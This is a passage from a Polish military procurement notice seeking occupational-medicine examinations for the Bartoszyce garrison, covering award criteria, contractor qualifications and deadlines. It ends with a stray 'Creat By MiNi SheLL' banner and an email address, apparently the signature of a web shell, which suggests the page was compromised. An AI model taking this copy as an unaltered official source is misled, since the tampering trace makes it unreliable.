poz. 607), Rozporządzeniem Ministra Zdrowia z dnia 5 grudnia 2022 r. w sprawie badań lekarskich osób ubiegających się o uprawnienia do kierowania pojazdami i kierowców (tj. Dz.U. z 2022 r., poz.2503), Rozporządzeniem Ministra Zdrowia z dnia 8 lipca 2014 r. w sprawie badań psychologicznych osób ubiegających się o uprawnienia do kierowania pojazdami, kierowców oraz osób wykonujących pracę na stanowisku kierowcy (Dz. U. z 2022 r., poz. 165 z późn.zm.) oraz przepisów resortowych:<br/> Ustawy z dnia 11 marca 2022 r. o obronie Ojczyzny (t.j. Dz.U. z 2022 r., poz. 2305 z późn. zm.), Rozporządzeniem Ministra Obrony Narodowej z dnia 9 sierpnia 2010 r. w sprawie służby medycyny pracy w jednostkach organizacyjnych podległych Ministrowi Obrony Narodowej (Dz. U. 2010 Nr 187 poz. 1257), Zarządzeniem Nr 12/MON z dnia 21 maja 2013 roku w sprawie utworzenia, przekształcenia i likwidacji podmiotów leczniczych w formie jednostki budżetowej z późn. zm. <br/>Badania lekarskie do celów sanitarno - epidemiologicznych wykonywane będą w oparciu o Ustawę z dnia 5 grudnia 2008 r. o zapobieganiu i zwalczaniu zakażeń i chorób zakaźnych u ludzi (tj. Dz. U. z 2023 r., poz. 1284 z poźn. zm.). <br/>Badania pracowników ochrony fizycznej realizowane będą zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 21 grudnia 2015 r. w sprawie badań lekarskich i psychologicznych osób ubiegających się o wpis lub posiadających wpis na listę kwalifikowanych pracowników ochrony fizycznej (Dz.U.2022, poz.2344). <br/>Wykonywanie czynności lekarskich w zakresie udział w posiedzeniach komisji BHP i społecznych przeglądach stanowisk służby i pracy, realizowane będą zgodnie z przepisami Ustawy z dnia 26 czerwca 1974 r. - Kodeks Pracy, (art. 237, Dz.U. z 2023 r., poz. 1465).<br/>Wykonawca akceptuje fakt, iż ilości badań lekarskich, laboratoryjnych, diagnostycznych i konsultacji specjalistycznych wyszczególnionych w poszczególnych częściach zamówienia są ilościami szacunkowymi i służyć będą wyłącznie do wyliczenia ceny oferty i wyboru Wykonawcy. Użyte przez Wykonawcę, (który złoży ofertę najkorzystniejszą) do obliczenia ceny oferowanej, ceny jednostkowe, będą stałe w okresie obowiązywania umowy.<br/>3.	Zamawiający nie ponosi konsekwencji finansowych zmniejszenia ilości badań.<br/>4.	Zamawiający zastrzega możliwość nie wykorzystania kwoty umowy w pełnej wysokości.<br/>5.	Wykonawcy należy się wynagrodzenie za faktycznie przeprowadzone badania.<br/>6.	Badanie profilaktyczne zakończone zostanie wydaniem zaświadczenia lekarskiego z przeprowadzonych badań na obowiązującym formularzu lub wydaniem wyników badań, które zlecił lekarz medycyny pracy.<br/>7.	Wykonawca zobowiązuje się prowadzić dokumentację medyczną pacjentów zgodnie z obowiązującymi przepisami w tym zakresie.<br/>8.	Wykonawca zobowiązuje się realizować procedurę odwoławczą zgodnie z zapisami Rozporządzenia Ministra Obrony Narodowej z dnia 9 sierpnia 2010 r. w sprawie służby medycyny pracy w jednostkach organizacyjnych podległych Ministrowi Obrony Narodowej (Dz. U. 2010, Nr 187 poz. 1257).<br/>9.	Wykonawca, który będzie realizował przedmiot zamówienia musi być wpisany do rejestru podmiotów wykonujących działalność leczniczą, o którym mowa w art. 100 i 106 ustawy <br/>z dnia 15 kwietnia 2011 r. o działalności leczniczej (t.j. Dz. U. z 2023, poz. 991 z późn.zm.) i posiadać aktualne ubezpieczenie OC, zgodnie z Rozporządzeniem Ministra Finansów z dnia 29 kwietnia 2019 r. w sprawie obowiązkowego ubezpieczenia odpowiedzialności cywilnej podmiotu wykonującego działalność leczniczą (Dz. U. z 2019 r. poz. 866 z późn. zm.).<br/>CZĘŚĆ ZAMÓWIENIA NR 4 – BADANIA PROFILAKTYCZNE ŻOŁNIERZE GARNIZON BARTOSZYCE, BADANIA PROFILAKTYCZNE PRACOWNICY CYWILNI GARNIZON BARTOSZYCE:<br/>Wykaz jednostek i instytucji wojskowych z Garnizonu Bartoszyce do zaopatrywania w usługi medyczne z zakresu medycyny pracy:<br/>- 21 Wojskowy Oddział Gospodarczy w Bartoszycach;<br/>- 20 Brygada Zmechanizowana w Bartoszycach;<br/>- Komórka wewnętrzna zamiejscowa OŻW w Bartoszycach;<br/>- Regionalne Centrum Informatyki w Bartoszycach.<br/>1.	Usługi medyczne obejmujące przedmiot zamówienia muszą być wykonywane <br/>w Bartoszycach lub w obrębie do 120 km od Bartoszyc.<br/>2.	Badania wykonywane będą na podstawie skierowania wystawionego żołnierzowi/ żołnierzowi DZSW/pracownikowi RON przez pracodawcę do lekarza medycyny pracy, które będzie zawierało dane dotyczące zajmowanego stanowiska, czynników szkodliwych dla zdrowia lub warunków uciążliwych.<br/>3.	Lekarz medycyny pracy w oparciu o w/w skierowanie określa zakres badań i konsultacji.<br/>4.	Wykonawca wykona badania i konsultacje specjalistyczne oraz wystawi zaświadczenie lekarskie z przeprowadzonych badań okresowych w okresie zadeklarowanym przez Wykonawcę w ofercie.<br/>5.	Wykonawca po przeprowadzeniu badań wystawi zaświadczenie lekarskie <br/>z przeprowadzonych badań okresowych, które wręczy badanemu żołnierzowi/ żołnierzowi DZSW/pracownikowi RON do rak własnych (oryginał plus kopia). Zaświadczenie będzie zawierało termin następnego badania lekarskiego określone pełną datą tj. dzień, miesiąc i rok.<br/>6.	Wykonawca po przeprowadzeniu przez okulistę badań okulistycznych i po stwierdzeniu konieczności stosowania przez żołnierza/ żołnierza DZSW/ pracownika RON okularów korygujących wzrok przy obsłudze monitora ekranowego udokumentuje konieczność korekcji wady wzroku, stosownym wpisem na zaświadczeniu lekarskim z przeprowadzonych badań okulistycznych.<br/>7.	Wykonawca realizować będzie usługi polegające na wykonywaniu czynności lekarskich <br/>w zakresie udziału w posiedzeniach komisji BHP i społecznych przeglądach stanowisk służby i pracy w Jednostkach i Instytucjach Wojskowych będących na zaopatrzeniu 21WOG.<br/>8.	Wykonawca będzie prowadził rejestr przyjmowanych żołnierzy/ żołnierzy DZSW/ pracowników RON zawierający: imię i nazwisko, numer PESEL, adres, nazwisko lekarza udzielającego świadczenia, datę badania i inne niezbędne dane do identyfikacji udzielonego świadczenia zdrowotnego.<br/>9.	Wykonawca prześle fakturę za wykonane usługi medycyny pracy, wystawioną oddzielnie za każdą jednostkę i instytucję wojskową, wraz z imiennym, sporządzonym w sposób czytelny, wykazem przebadanych żołnierzy, żołnierzy DZSW i pracowników RON z nr pesel oraz rodzajem i ilością przeprowadzonych badań, łączną wartością przeprowadzonych badań oraz łączną ilością wykonanych badań. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85121000-3 - Usługi medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-02 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">UWAGA:<br/>Określone w formularzu ofertowym ilości badań stanowią ilość szacunkową. Wyliczona dla tych ilości cena brutto oferty będzie służyła do porównania złożonych w postępowaniu ofert.<br/>Wartością umowy dla każdej części zamówienia będzie kwota środków przeznaczonych na sfinansowanie zamówienia (odpowiednio dla części zamówienia).<br/><br/>2.	Przy wyborze najkorzystniejszej oferty dla części zamówienia nr 2, 3, 4 Zamawiający będzie się kierował następującymi kryteriami: <br/>1)	Cena brutto oferty - 60%<br/><br/> najniższa oferowana cena brutto <br/>Liczba punktów = ------------------------------------------- x 100 pkt x 60%<br/> cena brutto oferty badanej<br/><br/>2)	Czas wykonania badań profilaktycznych, specjalistycznych oraz wystawienia zaświadczenia (odpowiednio dla części zamówienia) – 20%<br/>•	w ciągu jednego dnia roboczego od okazania skierowania przez żołnierza/żołnierza DZSW/pracownika RON: 20 pkt<br/>•	w ciągu dwóch dni roboczych od okazania skierowania przez żołnierza/żołnierza DZSW/pracownika RON: 10 pkt<br/>•	od trzech do pięciu dni roboczych od okazania skierowania przez żołnierza/żołnierza DZSW/pracownika RON: 0 pkt<br/><br/>3) Miejsce wykonania badań profilaktycznych (odpowiednio dla części zamówienia) – 20%<br/>•	jeśli badania profilaktyczne będą wykonane w miejscowości Braniewo, Morąg, Bartoszyce: 20 pkt<br/>•	jeśli badania profilaktyczne nie będą wykonane w miejscowości Braniewo, Morąg, Bartoszyce: 0 pkt <br/>UWAGA! Usługi medyczne obejmujące przedmiot zamówienia muszą być wykonywane w Braniewie/Morągu/Bartoszycach (odpowiednio dla części zamówienia) lub w obrębie:<br/>do 50 km od Braniewa (dla części zamówienia nr 2);<br/>lub do 60 km od Morąga (dla części zamówienia nr 3);<br/>lub do 120 km od Bartoszyc (dla części zamówienia nr 4).<br/>– odpowiednio dla części zamówienia<br/><br/>3.	Liczba punktów uzyskanych przez daną ofertę będzie wyliczana według wzoru: <br/>dla części zamówienia nr 2, 3, 4<br/>P = K1 +K2 +K3<br/>P - liczba punktów uzyskanych przez daną ofertę w trzech kryteriach;<br/>K1 - liczba punktów uzyskanych przez daną ofertę w kryterium „Cena brutto oferty”;<br/>K2 - liczba punktów uzyskanych przez daną ofertę w kryterium „Czas wykonania badań profilaktycznych, specjalistycznych oraz wystawienia zaświadczenia”; <br/>K3 - liczba punktów uzyskanych przez daną ofertę w kryterium „Miejsce wykonania badań profilaktycznych”.<br/><br/>4.	Oferta będzie podlegać ocenie dla każdej części zamówienia. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>5.	Za ofertę najkorzystniejszą zostanie uznana ta oferta spośród złożonych, która uzyska najwyższą liczbę punktów. Maksymalna liczba punktów, jaką może osiągnąć oferta wynosi 100.<br/>6.	Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wykonania badań profilaktycznych, specjalistycznych oraz wystawienia zaświadczenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Miejsce wykonania badań profilaktycznych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące<br/>uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, tj. posiadają uprawnienia do wykonywania<br/>działalności leczniczej, o której mowa w art. 100 i 106 ustawy z dnia 15 kwietnia 2011 r. o działalności leczniczej (Dz. U z 2023 r., poz. 991 z późn. zm.) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym<br/>terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków<br/>dowodowych:<br/>1) odpisu lub informacji z Krajowego Rejestru Sądowego lub Centralnej ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestracji lub ewidencji; lub Zamawiający nie wezwie, jeśli uzyska je za pomocą bezpłatnych<br/>i ogólnodostępnych baz danych w szczególności rejestrów publicznych;<br/>2) jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast dokumentu, o którym<br/>mowa w pkt 1), dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania,<br/>potwierdzające, że:<br/>nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami,<br/>jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej<br/>procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem.<br/>3) jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 2),<br/>zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze<br/>wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone<br/>pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod<br/>przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub<br/>gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy. Dokument powinien być wystawiony<br/>odpowiednio jak w terminie wskazanym w pkt 1).<br/>4) Do podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy Pzp (jeżeli dotyczy) oraz podwykonawców<br/>niebędących podmiotami udostępniającymi zasoby na tych zasadach, mających siedzibę lub miejsce zamieszkania poza terytorium<br/>Rzeczypospolitej Polskiej, przepisy pkt 2) i 3) stosuje się odpowiednio.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych<br/>środków dowodowych:<br/>1) wpisu do rejestru podmiotów wykonujących działalność leczniczą, <br/>o której mowa w art. 100 i 106 ustawy z dnia 15.04.2021 r. o działalności leczniczej (Dz. U z 2023 r., poz. 991 z późn. zm.) lub Zamawiający nie wezwie, jeśli uzyska je za pomocą bezpłatnych i ogólnodostępnych baz danych w szczególności rejestrów publicznych, o ile Wykonawca wskaże w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, sporządzonego zgodnie ze wzorem – załącznik nr 3 do SWZ (Rozdział IV oświadczenia), dane umożliwiające dostęp do tych środków.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.W przypadku Wykonawców wspólnie ubiegających się o udzielnie zamówienia:<br/>1) Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, jest spełniony, jeżeli<br/>co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia<br/>określonej działalności gospodarczej lub zawodowej i realizuje usługi, do których realizacji te uprawnienia są wymagane.<br/>2) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych Wykonawców, którzy wykonują roboty<br/>budowlane lub usługi do realizacji których, te zdolności są wymagane.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie, stanowiące załącznik nr 3<br/>do SWZ składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Dokumenty te potwierdzają brak<br/>podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu.<br/>3. Zgodnie z art. 117 ust. 4 ustawy Pzp, w przypadku, o którym mowa w Rozdziale VIII ust. 1 pkt 2 Wykonawcy wspólnieubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy - wzór - załącznik nr 5 do SWZ.<br/>4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego, których oferta zostanie uznana za najkorzystniejszą, przedłożą umowę regulującą współpracę tych Wykonawców, w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub osoby uprawnione do reprezentowania Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia znajdują się w §7 projektowanych postanowieniach umowy<br/>stanowiących załącznik nr 4 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-11-08 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://portal.smartpzp.pl/21wog</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-11-08 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-12-07</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Termin realizacji zamówienia: <br/>Część zamówienia nr 1 – od daty zawarcia umowy jednak nie wcześniej niż od 02.01.2024 r. do 31.12.2024 r., lub do wyczerpania kwoty stanowiącej wartość umowy;<br/>Część zamówienia nr 2 – od daty zawarcia umowy jednak nie wcześniej niż od 02.01.2024 r. do 31.12.2024 r., lub do wyczerpania kwoty stanowiącej wartość umowy;<br/>Część zamówienia nr 3 – od daty zawarcia umowy jednak nie wcześniej niż od 02.01.2024 r. do 31.12.2024 r., lub do wyczerpania kwoty stanowiącej wartość umowy;<br/>Część zamówienia nr 4 – od daty zawarcia umowy jednak nie wcześniej niż od 02.01.2024 r. do 31.12.2024 r., lub do wyczerpania kwoty stanowiącej wartość umowy.<br/>2. Zamawiający informuje, że z postępowania o udzielenie zamówienia wykluczy Wykonawcę na podstawie przesłanek<br/>opisanych w przepisie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.

Creat By MiNi SheLL
Email: jattceo@gmail.com